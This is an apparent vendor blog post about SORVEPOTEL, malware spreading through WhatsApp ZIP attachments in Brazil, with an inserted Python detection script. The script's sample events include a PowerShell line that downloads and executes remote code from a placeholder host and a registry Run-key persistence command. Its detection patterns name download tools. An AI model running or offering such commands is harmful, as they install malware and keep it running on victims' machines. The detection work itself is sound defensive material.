New Wave of Self-Spreading SORVEPOTEL Malware Targets WhatsApp Users in Brazil
John Jordan | Oct 6 | 2 min read | Updated: Oct 7
A newly discovered malware campaign has emerged in Brazil, using WhatsApp as a vector to rapidly infect Windows systems. The threat, dubbed SORVEPOTEL, exploits trusted communication channels and focuses on speed and widespread propagation, impacting various sectors including government, technology, and education.

Key Takeaways
The SORVEPOTEL malware campaign is currently targeting Brazilian WhatsApp users on Windows.
The malware spreads via phishing messages with malicious ZIP file attachments.
Infected accounts are often banned due to excessive spam propagation.
The intent is rapid distribution, rather than data theft or ransomware.
Multiple sectors, including public service and manufacturing, have been affected.
How SORVEPOTEL Infects Systems
The SORVEPOTEL campaign begins when WhatsApp users receive phishing messages from compromised contacts, making the messages seem trustworthy. These messages usually contain a ZIP attachment disguised as a harmless document, such as a receipt or an app file.
In some cases, the malicious ZIP files are also distributed through deceptive emails. When recipients open the ZIP attachment on a desktop, they encounter a shortcut file (LNK). Executing this file triggers a PowerShell script, which downloads the actual malware payload from a remote server. Once installed, the payload sets itself to start automatically with Windows, ensuring persistence.
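One way a defender could hunt for the chain described above (LNK opened from a ZIP, PowerShell download, autostart persistence) in process-creation telemetry. This is an added example, not code from the article or from the researchers' report; the Sysmon-style event records, field names and host names are constructed here, and it assumes Explorer's habit of staging a file opened straight out of a ZIP under %TEMP%\Temp1_<archive>.zip.

```python
import re
from collections import defaultdict

# Indicators of a PowerShell one-liner fetching a second stage from a remote server.
DOWNLOAD_RE = re.compile(
    r"(Net\.WebClient|DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b|\bcurl\b|Start-BitsTransfer)",
    re.IGNORECASE)
# Folder Explorer uses when a user double-clicks a member of a ZIP without extracting it (assumption).
ZIP_STAGING_RE = re.compile(r"\\AppData\\Local\\Temp\\Temp1_[^\\]+\.zip", re.IGNORECASE)
# Classic per-user autostart location written for persistence.
RUN_KEY_RE = re.compile(r"\\CurrentVersion\\Run\b", re.IGNORECASE)

# Constructed sample events (hypothetical hosts, users and URLs; not real indicators).
EVENTS = [
    {"host": "ws01", "ts": 1, "parent": "explorer.exe", "image": "powershell.exe",
     "cmdline": "powershell.exe -w hidden -c IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/p')",
     "cwd": r"C:\Users\alice\AppData\Local\Temp\Temp1_RECIBO.zip"},
    {"host": "ws01", "ts": 2, "parent": "powershell.exe", "image": "reg.exe",
     "cmdline": r"reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v upd /t REG_SZ /d C:\Users\alice\AppData\Roaming\upd.exe",
     "cwd": r"C:\Users\alice"},
    # Benign: an admin running a script from Explorer, no download, no ZIP staging folder.
    {"host": "ws02", "ts": 1, "parent": "explorer.exe", "image": "powershell.exe",
     "cmdline": r"powershell.exe -File C:\Scripts\backup.ps1", "cwd": r"C:\Scripts"},
]


def detect(events):
    """Return {host: [matched stages]} for hosts showing the ZIP -> LNK -> PowerShell -> autostart chain."""
    stages = defaultdict(list)
    for e in sorted(events, key=lambda ev: (ev["host"], ev["ts"])):
        img, parent, cmd = e["image"].lower(), e["parent"].lower(), e["cmdline"]
        # Stage 1: user-launched (explorer.exe child) PowerShell that downloads something,
        # running from the folder Explorer staged the ZIP member into.
        if (parent == "explorer.exe" and img == "powershell.exe"
                and DOWNLOAD_RE.search(cmd) and ZIP_STAGING_RE.search(e.get("cwd", ""))):
            stages[e["host"]].append("download-from-zip")
        # Stage 2: a PowerShell descendant writing a Run key, counted only after stage 1 on the same host.
        elif (parent == "powershell.exe" and RUN_KEY_RE.search(cmd)
                and "download-from-zip" in stages[e["host"]]):
            stages[e["host"]].append("run-key-persistence")
    return {h: s for h, s in stages.items() if s}


if __name__ == "__main__":
    for host, matched in detect(EVENTS).items():
        print(host, "->", ", ".join(matched))
```

In production the same logic would be fed from Sysmon event ID 1 (process creation) or an EDR's process telemetry, and a host reaching the second stage warrants isolation and a check of the user's WhatsApp Web sessions.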
Self-Propagation Through WhatsApp Web
One of SORVEPOTEL's standout features is its use of the WhatsApp Web application for self-propagation. If the malware detects an active WhatsApp Web session on the infected device, it automatically circulates the malicious ZIP file to all of the victim’s contacts and groups. This aggressive and automated approach rapidly expands the spread of the malware.
However, this high volume of outgoing spam often triggers WhatsApp’s automated defenses, leading to account suspensions or outright bans. While significant disruption occurs, there is no current evidence that the attackers are stealing or encrypting data from victims’ systems.
Who Is Being Targeted?
Although anyone using WhatsApp on Windows could be vulnerable, statistics show 457 out of 477 known infections have occurred in Brazil. Impacted organizations span:
Government
Public Services
Manufacturing
Technology
Education
Construction
This trend suggests attackers may be prioritizing enterprise and institutional users who frequently access WhatsApp via desktop systems.
Security Recommendations
To minimize the risk of SORVEPOTEL infection, experts recommend the following precautions:
Never open suspicious email or WhatsApp attachments, especially ZIP files, from unverified sources.
Avoid running unexpected shortcut (LNK) files on your desktop.
Keep your antivirus and security solutions up to date.
Regularly monitor WhatsApp account activity for signs of compromise.
By remaining vigilant and following good cybersecurity hygiene, users and organizations can protect themselves from rapidly spreading threats like SORVEPOTEL. As cyber threats become increasingly sophisticated, your security strategy must evolve to keep pace. BetterWorld Technology offers adaptive cybersecurity solutions that grow with the threat landscape, helping your business stay secure while continuing to innovate. Reach out today to schedule your personalized consultation.
References
Researchers Warn of Self-Spreading WhatsApp Malware Named SORVEPOTEL, The Hacker News.